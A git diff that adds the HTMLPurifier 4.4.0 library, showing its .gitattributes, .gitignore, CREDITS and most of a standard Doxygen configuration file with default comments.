diff options
Diffstat (limited to 'lib/htmlpurifier')
804 files changed, 64325 insertions, 0 deletions
diff --git a/lib/htmlpurifier/.gitattributes b/lib/htmlpurifier/.gitattributes new file mode 100644 index 000000000..51e648377 --- /dev/null +++ b/lib/htmlpurifier/.gitattributes @@ -0,0 +1 @@ +configdoc/usage.xml -crlf diff --git a/lib/htmlpurifier/.gitignore b/lib/htmlpurifier/.gitignore new file mode 100644 index 000000000..4d6ef8d2f --- /dev/null +++ b/lib/htmlpurifier/.gitignore @@ -0,0 +1,22 @@ +tags +conf/ +test-settings.php +config-schema.php +library/HTMLPurifier/DefinitionCache/Serializer/*/ +library/standalone/ +library/HTMLPurifier.standalone.php +library/HTMLPurifier*.tgz +library/package*.xml +smoketests/test-schema.html +configdoc/*.html +configdoc/configdoc.xml +docs/doxygen* +*.phpt.diff +*.phpt.exp +*.phpt.log +*.phpt.out +*.phpt.php +*.phpt.skip.php +*.htmlt.ini +*.patch +/*.php diff --git a/lib/htmlpurifier/CREDITS b/lib/htmlpurifier/CREDITS new file mode 100644 index 000000000..7921b45af --- /dev/null +++ b/lib/htmlpurifier/CREDITS @@ -0,0 +1,9 @@ + +CREDITS + +Almost everything written by Edward Z. Yang (Ambush Commander). Lots of thanks +to the DevNetwork Community for their help (see docs/ref-devnetwork.html for +more details), Feyd especially (namely IPv6 and optimization). Thanks to RSnake +for letting me package his fantastic XSS cheatsheet for a smoketest. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/Doxyfile b/lib/htmlpurifier/Doxyfile new file mode 100644 index 000000000..ff06806e7 --- /dev/null +++ b/lib/htmlpurifier/Doxyfile @@ -0,0 +1,1317 @@ +# Doxyfile 1.5.3 + +# This file describes the settings to be used by the documentation system +# doxygen (www.doxygen.org) for a project +# +# All text after a hash (#) is considered a comment and will be ignored +# The format is: +# TAG = value [value, ...] +# For lists items can also be appended using: +# TAG += value [value, ...] +# Values that contain spaces should be placed between quotes (" ") + +#--------------------------------------------------------------------------- +# Project related configuration options +#--------------------------------------------------------------------------- + +# This tag specifies the encoding used for all characters in the config file that +# follow. The default is UTF-8 which is also the encoding used for all text before +# the first occurrence of this tag. Doxygen uses libiconv (or the iconv built into +# libc) for the transcoding. See http://www.gnu.org/software/libiconv for the list of +# possible encodings. + +DOXYFILE_ENCODING = UTF-8 + +# The PROJECT_NAME tag is a single word (or a sequence of words surrounded +# by quotes) that should identify the project. + +PROJECT_NAME = HTMLPurifier + +# The PROJECT_NUMBER tag can be used to enter a project or revision number. +# This could be handy for archiving the generated documentation or +# if some version control system is used. + +PROJECT_NUMBER = 4.4.0 + +# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute) +# base path where the generated documentation will be put. +# If a relative path is entered, it will be relative to the location +# where doxygen was started. If left blank the current directory will be used. + +OUTPUT_DIRECTORY = "docs/doxygen " + +# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create +# 4096 sub-directories (in 2 levels) under the output directory of each output +# format and will distribute the generated files over these directories. +# Enabling this option can be useful when feeding doxygen a huge amount of +# source files, where putting all generated files in the same directory would +# otherwise cause performance problems for the file system. + +CREATE_SUBDIRS = NO + +# The OUTPUT_LANGUAGE tag is used to specify the language in which all +# documentation generated by doxygen is written. Doxygen will use this +# information to generate all constant output in the proper language. +# The default language is English, other supported languages are: +# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional, +# Croatian, Czech, Danish, Dutch, Finnish, French, German, Greek, Hungarian, +# Italian, Japanese, Japanese-en (Japanese with English messages), Korean, +# Korean-en, Lithuanian, Norwegian, Polish, Portuguese, Romanian, Russian, +# Serbian, Slovak, Slovene, Spanish, Swedish, and Ukrainian. + +OUTPUT_LANGUAGE = English + +# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will +# include brief member descriptions after the members that are listed in +# the file and class documentation (similar to JavaDoc). +# Set to NO to disable this. + +BRIEF_MEMBER_DESC = YES + +# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend +# the brief description of a member or function before the detailed description. +# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the +# brief descriptions will be completely suppressed. + +REPEAT_BRIEF = YES + +# This tag implements a quasi-intelligent brief description abbreviator +# that is used to form the text in various listings. Each string +# in this list, if found as the leading text of the brief description, will be +# stripped from the text and the result after processing the whole list, is +# used as the annotated text. Otherwise, the brief description is used as-is. +# If left blank, the following values are used ("$name" is automatically +# replaced with the name of the entity): "The $name class" "The $name widget" +# "The $name file" "is" "provides" "specifies" "contains" +# "represents" "a" "an" "the" + +ABBREVIATE_BRIEF = "The $name class " \ + "The $name widget " \ + "The $name file " \ + is \ + provides \ + specifies \ + contains \ + represents \ + a \ + an \ + the + +# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then +# Doxygen will generate a detailed section even if there is only a brief +# description. + +ALWAYS_DETAILED_SEC = NO + +# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all +# inherited members of a class in the documentation of that class as if those +# members were ordinary class members. Constructors, destructors and assignment +# operators of the base classes will not be shown. + +INLINE_INHERITED_MEMB = NO + +# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full +# path before files name in the file list and in the header files. If set +# to NO the shortest path that makes the file name unique will be used. + +FULL_PATH_NAMES = YES + +# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag +# can be used to strip a user-defined part of the path. Stripping is +# only done if one of the specified strings matches the left-hand part of +# the path. The tag can be used to show relative paths in the file list. +# If left blank the directory from which doxygen is run is used as the +# path to strip. + +STRIP_FROM_PATH = "C:/Users/Edward/Webs/htmlpurifier " \ + "C:/Documents and Settings/Edward/My Documents/My Webs/htmlpurifier " + +# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of +# the path mentioned in the documentation of a class, which tells +# the reader which header file to include in order to use a class. +# If left blank only the name of the header file containing the class +# definition is used. Otherwise one should specify the include paths that +# are normally passed to the compiler using the -I flag. + +STRIP_FROM_INC_PATH = + +# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter +# (but less readable) file names. This can be useful is your file systems +# doesn't support long names like on DOS, Mac, or CD-ROM. + +SHORT_NAMES = NO + +# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen +# will interpret the first line (until the first dot) of a JavaDoc-style +# comment as the brief description. If set to NO, the JavaDoc +# comments will behave just like regular Qt-style comments +# (thus requiring an explicit @brief command for a brief description.) + +JAVADOC_AUTOBRIEF = YES + +# If the QT_AUTOBRIEF tag is set to YES then Doxygen will +# interpret the first line (until the first dot) of a Qt-style +# comment as the brief description. If set to NO, the comments +# will behave just like regular Qt-style comments (thus requiring +# an explicit \brief command for a brief description.) + +QT_AUTOBRIEF = NO + +# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen +# treat a multi-line C++ special comment block (i.e. a block of //! or /// +# comments) as a brief description. This used to be the default behaviour. +# The new default is to treat a multi-line C++ comment block as a detailed +# description. Set this tag to YES if you prefer the old behaviour instead. + +MULTILINE_CPP_IS_BRIEF = NO + +# If the DETAILS_AT_TOP tag is set to YES then Doxygen +# will output the detailed description near the top, like JavaDoc. +# If set to NO, the detailed description appears after the member +# documentation. + +DETAILS_AT_TOP = NO + +# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented +# member inherits the documentation from any documented member that it +# re-implements. + +INHERIT_DOCS = YES + +# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce +# a new page for each member. If set to NO, the documentation of a member will +# be part of the file/class/namespace that contains it. + +SEPARATE_MEMBER_PAGES = NO + +# The TAB_SIZE tag can be used to set the number of spaces in a tab. +# Doxygen uses this value to replace tabs by spaces in code fragments. + +TAB_SIZE = 4 + +# This tag can be used to specify a number of aliases that acts +# as commands in the documentation. An alias has the form "name=value". +# For example adding "sideeffect=\par Side Effects:\n" will allow you to +# put the command \sideeffect (or @sideeffect) in the documentation, which +# will result in a user-defined paragraph with heading "Side Effects:". +# You can put \n's in the value part of an alias to insert newlines. + +ALIASES = + +# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C +# sources only. Doxygen will then generate output that is more tailored for C. +# For instance, some of the names that are used will be different. The list +# of all members will be omitted, etc. + +OPTIMIZE_OUTPUT_FOR_C = NO + +# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java +# sources only. Doxygen will then generate output that is more tailored for Java. +# For instance, namespaces will be presented as packages, qualified scopes +# will look different, etc. + +OPTIMIZE_OUTPUT_JAVA = NO + +# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want to +# include (a tag file for) the STL sources as input, then you should +# set this tag to YES in order to let doxygen match functions declarations and +# definitions whose arguments contain STL classes (e.g. func(std::string); v.s. +# func(std::string) {}). This also make the inheritance and collaboration +# diagrams that involve STL classes more complete and accurate. + +BUILTIN_STL_SUPPORT = NO + +# If you use Microsoft's C++/CLI language, you should set this option to YES to +# enable parsing support. + +CPP_CLI_SUPPORT = NO + +# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC +# tag is set to YES, then doxygen will reuse the documentation of the first +# member in the group (if any) for the other members of the group. By default +# all members of a group must be documented explicitly. + +DISTRIBUTE_GROUP_DOC = NO + +# Set the SUBGROUPING tag to YES (the default) to allow class member groups of +# the same type (for instance a group of public functions) to be put as a +# subgroup of that type (e.g. under the Public Functions section). Set it to +# NO to prevent subgrouping. Alternatively, this can be done per class using +# the \nosubgrouping command. + +SUBGROUPING = YES + +#--------------------------------------------------------------------------- +# Build related configuration options +#--------------------------------------------------------------------------- + +# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in +# documentation are documented, even if no documentation was available. +# Private class members and static file members will be hidden unless +# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES + +EXTRACT_ALL = YES + +# If the EXTRACT_PRIVATE tag is set to YES all private members of a class +# will be included in the documentation. + +EXTRACT_PRIVATE = YES + +# If the EXTRACT_STATIC tag is set to YES all static members of a file +# will be included in the documentation. + +EXTRACT_STATIC = YES + +# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs) +# defined locally in source files will be included in the documentation. +# If set to NO only classes defined in header files are included. + +EXTRACT_LOCAL_CLASSES = YES + +# This flag is only useful for Objective-C code. When set to YES local +# methods, which are defined in the implementation section but not in +# the interface are included in the documentation. +# If set to NO (the default) only methods in the interface are included. + +EXTRACT_LOCAL_METHODS = NO + +# If this flag is set to YES, the members of anonymous namespaces will be extracted +# and appear in the documentation as a namespace called 'anonymous_namespace{file}', +# where file will be replaced with the base name of the file that contains the anonymous +# namespace. By default anonymous namespace are hidden. + +EXTRACT_ANON_NSPACES = NO + +# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all +# undocumented members of documented classes, files or namespaces. +# If set to NO (the default) these members will be included in the +# various overviews, but no documentation section is generated. +# This option has no effect if EXTRACT_ALL is enabled. + +HIDE_UNDOC_MEMBERS = NO + +# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all +# undocumented classes that are normally visible in the class hierarchy. +# If set to NO (the default) these classes will be included in the various +# overviews. This option has no effect if EXTRACT_ALL is enabled. + +HIDE_UNDOC_CLASSES = NO + +# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all +# friend (class|struct|union) declarations. +# If set to NO (the default) these declarations will be included in the +# documentation. + +HIDE_FRIEND_COMPOUNDS = NO + +# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any +# documentation blocks found inside the body of a function. +# If set to NO (the default) these blocks will be appended to the +# function's detailed documentation block. + +HIDE_IN_BODY_DOCS = NO + +# The INTERNAL_DOCS tag determines if documentation +# that is typed after a \internal command is included. If the tag is set +# to NO (the default) then the documentation will be excluded. +# Set it to YES to include the internal documentation. + +INTERNAL_DOCS = NO + +# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate +# file names in lower-case letters. If set to YES upper-case letters are also +# allowed. This is useful if you have classes or files whose names only differ +# in case and if your file system supports case sensitive file names. Windows +# and Mac users are advised to set this option to NO. + +CASE_SENSE_NAMES = YES + +# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen +# will show members with their full class and namespace scopes in the +# documentation. If set to YES the scope will be hidden. + +HIDE_SCOPE_NAMES = NO + +# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen +# will put a list of the files that are included by a file in the documentation +# of that file. + +SHOW_INCLUDE_FILES = YES + +# If the INLINE_INFO tag is set to YES (the default) then a tag [inline] +# is inserted in the documentation for inline members. + +INLINE_INFO = YES + +# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen +# will sort the (detailed) documentation of file and class members +# alphabetically by member name. If set to NO the members will appear in +# declaration order. + +SORT_MEMBER_DOCS = YES + +# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the +# brief documentation of file, namespace and class members alphabetically +# by member name. If set to NO (the default) the members will appear in +# declaration order. + +SORT_BRIEF_DOCS = NO + +# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be +# sorted by fully-qualified names, including namespaces. If set to +# NO (the default), the class list will be sorted only by class name, +# not including the namespace part. +# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES. +# Note: This option applies only to the class list, not to the +# alphabetical list. + +SORT_BY_SCOPE_NAME = NO + +# The GENERATE_TODOLIST tag can be used to enable (YES) or +# disable (NO) the todo list. This list is created by putting \todo +# commands in the documentation. + +GENERATE_TODOLIST = YES + +# The GENERATE_TESTLIST tag can be used to enable (YES) or +# disable (NO) the test list. This list is created by putting \test +# commands in the documentation. + +GENERATE_TESTLIST = YES + +# The GENERATE_BUGLIST tag can be used to enable (YES) or +# disable (NO) the bug list. This list is created by putting \bug +# commands in the documentation. + +GENERATE_BUGLIST = YES + +# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or +# disable (NO) the deprecated list. This list is created by putting +# \deprecated commands in the documentation. + +GENERATE_DEPRECATEDLIST= YES + +# The ENABLED_SECTIONS tag can be used to enable conditional +# documentation sections, marked by \if sectionname ... \endif. + +ENABLED_SECTIONS = + +# The MAX_INITIALIZER_LINES tag determines the maximum number of lines +# the initial value of a variable or define consists of for it to appear in +# the documentation. If the initializer consists of more lines than specified +# here it will be hidden. Use a value of 0 to hide initializers completely. +# The appearance of the initializer of individual variables and defines in the +# documentation can be controlled using \showinitializer or \hideinitializer +# command in the documentation regardless of this setting. + +MAX_INITIALIZER_LINES = 30 + +# Set the SHOW_USED_FILES tag to NO to disable the list of files generated +# at the bottom of the documentation of classes and structs. If set to YES the +# list will mention the files that were used to generate the documentation. + +SHOW_USED_FILES = YES + +# If the sources in your project are distributed over multiple directories +# then setting the SHOW_DIRECTORIES tag to YES will show the directory hierarchy +# in the documentation. The default is NO. + +SHOW_DIRECTORIES = NO + +# The FILE_VERSION_FILTER tag can be used to specify a program or script that +# doxygen should invoke to get the current version for each file (typically from the +# version control system). Doxygen will invoke the program by executing (via +# popen()) the command <command> <input-file>, where <command> is the value of +# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file +# provided by doxygen. Whatever the program writes to standard output +# is used as the file version. See the manual for examples. + +FILE_VERSION_FILTER = + +#--------------------------------------------------------------------------- +# configuration options related to warning and progress messages +#--------------------------------------------------------------------------- + +# The QUIET tag can be used to turn on/off the messages that are generated +# by doxygen. Possible values are YES and NO. If left blank NO is used. + +QUIET = NO + +# The WARNINGS tag can be used to turn on/off the warning messages that are +# generated by doxygen. Possible values are YES and NO. If left blank +# NO is used. + +WARNINGS = YES + +# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings +# for undocumented members. If EXTRACT_ALL is set to YES then this flag will +# automatically be disabled. + +WARN_IF_UNDOCUMENTED = YES + +# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for +# potential errors in the documentation, such as not documenting some +# parameters in a documented function, or documenting parameters that +# don't exist or using markup commands wrongly. + +WARN_IF_DOC_ERROR = YES + +# This WARN_NO_PARAMDOC option can be abled to get warnings for +# functions that are documented, but have no documentation for their parameters +# or return value. If set to NO (the default) doxygen will only warn about +# wrong or incomplete parameter documentation, but not about the absence of +# documentation. + +WARN_NO_PARAMDOC = NO + +# The WARN_FORMAT tag determines the format of the warning messages that +# doxygen can produce. The string should contain the $file, $line, and $text +# tags, which will be replaced by the file and line number from which the +# warning originated and the warning text. Optionally the format may contain +# $version, which will be replaced by the version of the file (if it could +# be obtained via FILE_VERSION_FILTER) + +WARN_FORMAT = "$file:$line: $text " + +# The WARN_LOGFILE tag can be used to specify a file to which warning +# and error messages should be written. If left blank the output is written +# to stderr. + +WARN_LOGFILE = + +#--------------------------------------------------------------------------- +# configuration options related to the input files +#--------------------------------------------------------------------------- + +# The INPUT tag can be used to specify the files and/or directories that contain +# documented source files. You may enter file names like "myfile.cpp" or +# directories like "/usr/src/myproject". Separate the files or directories +# with spaces. + +INPUT = ". " + +# This tag can be used to specify the character encoding of the source files that +# doxygen parses. Internally doxygen uses the UTF-8 encoding, which is also the default +# input encoding. Doxygen uses libiconv (or the iconv built into libc) for the transcoding. +# See http://www.gnu.org/software/libiconv for the list of possible encodings. + +INPUT_ENCODING = UTF-8 + +# If the value of the INPUT tag contains directories, you can use the +# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp +# and *.h) to filter out the source-files in the directories. If left +# blank the following patterns are tested: +# *.c *.cc *.cxx *.cpp *.c++ *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh *.hxx +# *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.py + +FILE_PATTERNS = *.php + +# The RECURSIVE tag can be used to turn specify whether or not subdirectories +# should be searched for input files as well. Possible values are YES and NO. +# If left blank NO is used. + +RECURSIVE = YES + +# The EXCLUDE tag can be used to specify files and/or directories that should +# excluded from the INPUT source files. This way you can easily exclude a +# subdirectory from a directory tree whose root is specified with the INPUT tag. + +EXCLUDE = + +# The EXCLUDE_SYMLINKS tag can be used select whether or not files or +# directories that are symbolic links (a Unix filesystem feature) are excluded +# from the input. + +EXCLUDE_SYMLINKS = NO + +# If the value of the INPUT tag contains directories, you can use the +# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude +# certain files from those directories. Note that the wildcards are matched +# against the file with absolute path, so to exclude all test directories +# for example use the pattern */test/* + +EXCLUDE_PATTERNS = */tests/* \ + */benchmarks/* \ + */docs/* \ + */test-settings.php \ + */configdoc/* \ + */test-settings.php \ + */maintenance/* \ + */smoketests/* \ + */library/standalone/* \ + */.svn* \ + */conf/* + +# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names +# (namespaces, classes, functions, etc.) that should be excluded from the output. +# The symbol name can be a fully qualified name, a word, or if the wildcard * is used, +# a substring. Examples: ANamespace, AClass, AClass::ANamespace, ANamespace::*Test + +EXCLUDE_SYMBOLS = + +# The EXAMPLE_PATH tag can be used to specify one or more files or +# directories that contain example code fragments that are included (see +# the \include command). + +EXAMPLE_PATH = + +# If the value of the EXAMPLE_PATH tag contains directories, you can use the +# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp +# and *.h) to filter out the source-files in the directories. If left +# blank all files are included. + +EXAMPLE_PATTERNS = * + +# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be +# searched for input files to be used with the \include or \dontinclude +# commands irrespective of the value of the RECURSIVE tag. +# Possible values are YES and NO. If left blank NO is used. + +EXAMPLE_RECURSIVE = NO + +# The IMAGE_PATH tag can be used to specify one or more files or +# directories that contain image that are included in the documentation (see +# the \image command). + +IMAGE_PATH = + +# The INPUT_FILTER tag can be used to specify a program that doxygen should +# invoke to filter for each input file. Doxygen will invoke the filter program +# by executing (via popen()) the command <filter> <input-file>, where <filter> +# is the value of the INPUT_FILTER tag, and <input-file> is the name of an +# input file. Doxygen will then use the output that the filter program writes +# to standard output. If FILTER_PATTERNS is specified, this tag will be +# ignored. + +INPUT_FILTER = + +# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern +# basis. Doxygen will compare the file name with each pattern and apply the +# filter if there is a match. The filters are a list of the form: +# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further +# info on how filters are used. If FILTER_PATTERNS is empty, INPUT_FILTER +# is applied to all files. + +FILTER_PATTERNS = + +# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using +# INPUT_FILTER) will be used to filter the input files when producing source +# files to browse (i.e. when SOURCE_BROWSER is set to YES). + +FILTER_SOURCE_FILES = NO + +#--------------------------------------------------------------------------- +# configuration options related to source browsing +#--------------------------------------------------------------------------- + +# If the SOURCE_BROWSER tag is set to YES then a list of source files will +# be generated. Documented entities will be cross-referenced with these sources. +# Note: To get rid of all source code in the generated output, make sure also +# VERBATIM_HEADERS is set to NO. If you have enabled CALL_GRAPH or CALLER_GRAPH +# then you must also enable this option. If you don't then doxygen will produce +# a warning and turn it on anyway + +SOURCE_BROWSER = YES + +# Setting the INLINE_SOURCES tag to YES will include the body +# of functions and classes directly in the documentation. + +INLINE_SOURCES = NO + +# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct +# doxygen to hide any special comment blocks from generated source code +# fragments. Normal C and C++ comments will always remain visible. + +STRIP_CODE_COMMENTS = YES + +# If the REFERENCED_BY_RELATION tag is set to YES (the default) +# then for each documented function all documented +# functions referencing it will be listed. + +REFERENCED_BY_RELATION = YES + +# If the REFERENCES_RELATION tag is set to YES (the default) +# then for each documented function all documented entities +# called/used by that function will be listed. + +REFERENCES_RELATION = YES + +# If the REFERENCES_LINK_SOURCE tag is set to YES (the default) +# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from +# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will +# link to the source code. Otherwise they will link to the documentstion. + +REFERENCES_LINK_SOURCE = YES + +# If the USE_HTAGS tag is set to YES then the references to source code +# will point to the HTML generated by the htags(1) tool instead of doxygen +# built-in source browser. The htags tool is part of GNU's global source +# tagging system (see http://www.gnu.org/software/global/global.html). You +# will need version 4.8.6 or higher. + +USE_HTAGS = NO + +# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen +# will generate a verbatim copy of the header file for each class for +# which an include is specified. Set to NO to disable this. + +VERBATIM_HEADERS = YES + +#--------------------------------------------------------------------------- +# configuration options related to the alphabetical class index +#--------------------------------------------------------------------------- + +# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index +# of all compounds will be generated. Enable this if the project +# contains a lot of classes, structs, unions or interfaces. + +ALPHABETICAL_INDEX = NO + +# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then +# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns +# in which this list will be split (can be a number in the range [1..20]) + +COLS_IN_ALPHA_INDEX = 5 + +# In case all classes in a project start with a common prefix, all +# classes will be put under the same header in the alphabetical index. +# The IGNORE_PREFIX tag can be used to specify one or more prefixes that +# should be ignored while generating the index headers. + +IGNORE_PREFIX = + +#--------------------------------------------------------------------------- +# configuration options related to the HTML output +#--------------------------------------------------------------------------- + +# If the GENERATE_HTML tag is set to YES (the default) Doxygen will +# generate HTML output. + +GENERATE_HTML = YES + +# The HTML_OUTPUT tag is used to specify where the HTML docs will be put. +# If a relative path is entered the value of OUTPUT_DIRECTORY will be +# put in front of it. If left blank `html' will be used as the default path. + +HTML_OUTPUT = html + +# The HTML_FILE_EXTENSION tag can be used to specify the file extension for +# each generated HTML page (for example: .htm,.php,.asp). If it is left blank +# doxygen will generate files with .html extension. + +HTML_FILE_EXTENSION = .html + +# The HTML_HEADER tag can be used to specify a personal HTML header for +# each generated HTML page. If it is left blank doxygen will generate a +# standard header. + +HTML_HEADER = + +# The HTML_FOOTER tag can be used to specify a personal HTML footer for +# each generated HTML page. If it is left blank doxygen will generate a +# standard footer. + +HTML_FOOTER = + +# The HTML_STYLESHEET tag can be used to specify a user-defined cascading +# style sheet that is used by each HTML page. It can be used to +# fine-tune the look of the HTML output. If the tag is left blank doxygen +# will generate a default style sheet. Note that doxygen will try to copy +# the style sheet file to the HTML output directory, so don't put your own +# stylesheet in the HTML output directory as well, or it will be erased! + +HTML_STYLESHEET = + +# If the HTML_ALIGN_MEMBERS tag is set to YES, the members of classes, +# files or namespaces will be aligned in HTML using tables. If set to +# NO a bullet list will be used. + +HTML_ALIGN_MEMBERS = YES + +# If the GENERATE_HTMLHELP tag is set to YES, additional index files +# will be generated that can be used as input for tools like the +# Microsoft HTML help workshop to generate a compressed HTML help file (.chm) +# of the generated HTML documentation. + +GENERATE_HTMLHELP = NO + +# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML +# documentation will contain sections that can be hidden and shown after the +# page has loaded. For this to work a browser that supports +# JavaScript and DHTML is required (for instance Mozilla 1.0+, Firefox +# Netscape 6.0+, Internet explorer 5.0+, Konqueror, or Safari). + +HTML_DYNAMIC_SECTIONS = NO + +# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can +# be used to specify the file name of the resulting .chm file. You +# can add a path in front of the file if the result should not be +# written to the html output directory. + +CHM_FILE = + +# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can +# be used to specify the location (absolute path including file name) of +# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run +# the HTML help compiler on the generated index.hhp. + +HHC_LOCATION = + +# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag +# controls if a separate .chi index file is generated (YES) or that +# it should be included in the master .chm file (NO). + +GENERATE_CHI = NO + +# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag +# controls whether a binary table of contents is generated (YES) or a +# normal table of contents (NO) in the .chm file. + +BINARY_TOC = NO + +# The TOC_EXPAND flag can be set to YES to add extra items for group members +# to the contents of the HTML help documentation and to the tree view. + +TOC_EXPAND = NO + +# The DISABLE_INDEX tag can be used to turn on/off the condensed index at +# top of each HTML page. The value NO (the default) enables the index and +# the value YES disables it. + +DISABLE_INDEX = NO + +# This tag can be used to set the number of enum values (range [1..20]) +# that doxygen will group on one line in the generated HTML documentation. + +ENUM_VALUES_PER_LINE = 4 + +# If the GENERATE_TREEVIEW tag is set to YES, a side panel will be +# generated containing a tree-like index structure (just like the one that +# is generated for HTML Help). For this to work a browser that supports +# JavaScript, DHTML, CSS and frames is required (for instance Mozilla 1.0+, +# Netscape 6.0+, Internet explorer 5.0+, or Konqueror). Windows users are +# probably better off using the HTML help feature. + +GENERATE_TREEVIEW = YES + +# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be +# used to set the initial width (in pixels) of the frame in which the tree +# is shown. + +TREEVIEW_WIDTH = 250 + +#--------------------------------------------------------------------------- +# configuration options related to the LaTeX output +#--------------------------------------------------------------------------- + +# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will +# generate Latex output. + +GENERATE_LATEX = NO + +# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put. +# If a relative path is entered the value of OUTPUT_DIRECTORY will be +# put in front of it. If left blank `latex' will be used as the default path. + +LATEX_OUTPUT = latex + +# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be +# invoked. If left blank `latex' will be used as the default command name. + +LATEX_CMD_NAME = latex + +# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to +# generate index for LaTeX. If left blank `makeindex' will be used as the +# default command name. + +MAKEINDEX_CMD_NAME = makeindex + +# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact +# LaTeX documents. This may be useful for small projects and may help to +# save some trees in general. + +COMPACT_LATEX = NO + +# The PAPER_TYPE tag can be used to set the paper type that is used +# by the printer. Possible values are: a4, a4wide, letter, legal and +# executive. If left blank a4wide will be used. + +PAPER_TYPE = a4wide + +# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX +# packages that should be included in the LaTeX output. + +EXTRA_PACKAGES = + +# The LATEX_HEADER tag can be used to specify a personal LaTeX header for +# the generated latex document. The header should contain everything until +# the first chapter. If it is left blank doxygen will generate a +# standard header. Notice: only use this tag if you know what you are doing! + +LATEX_HEADER = + +# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated +# is prepared for conversion to pdf (using ps2pdf). The pdf file will +# contain links (just like the HTML output) instead of page references +# This makes the output suitable for online browsing using a pdf viewer. + +PDF_HYPERLINKS = YES + +# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of +# plain latex in the generated Makefile. Set this option to YES to get a +# higher quality PDF documentation. + +USE_PDFLATEX = YES + +# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode. +# command to the generated LaTeX files. This will instruct LaTeX to keep +# running if errors occur, instead of asking the user for help. +# This option is also used when generating formulas in HTML. + +LATEX_BATCHMODE = NO + +# If LATEX_HIDE_INDICES is set to YES then doxygen will not +# include the index chapters (such as File Index, Compound Index, etc.) +# in the output. + +LATEX_HIDE_INDICES = NO + +#--------------------------------------------------------------------------- +# configuration options related to the RTF output +#--------------------------------------------------------------------------- + +# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output +# The RTF output is optimized for Word 97 and may not look very pretty with +# other RTF readers or editors. + +GENERATE_RTF = NO + +# The RTF_OUTPUT tag is used to specify where the RTF docs will be put. +# If a relative path is entered the value of OUTPUT_DIRECTORY will be +# put in front of it. If left blank `rtf' will be used as the default path. + +RTF_OUTPUT = rtf + +# If the COMPACT_RTF tag is set to YES Doxygen generates more compact +# RTF documents. This may be useful for small projects and may help to +# save some trees in general. + +COMPACT_RTF = NO + +# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated +# will contain hyperlink fields. The RTF file will +# contain links (just like the HTML output) instead of page references. +# This makes the output suitable for online browsing using WORD or other +# programs which support those fields. +# Note: wordpad (write) and others do not support links. + +RTF_HYPERLINKS = NO 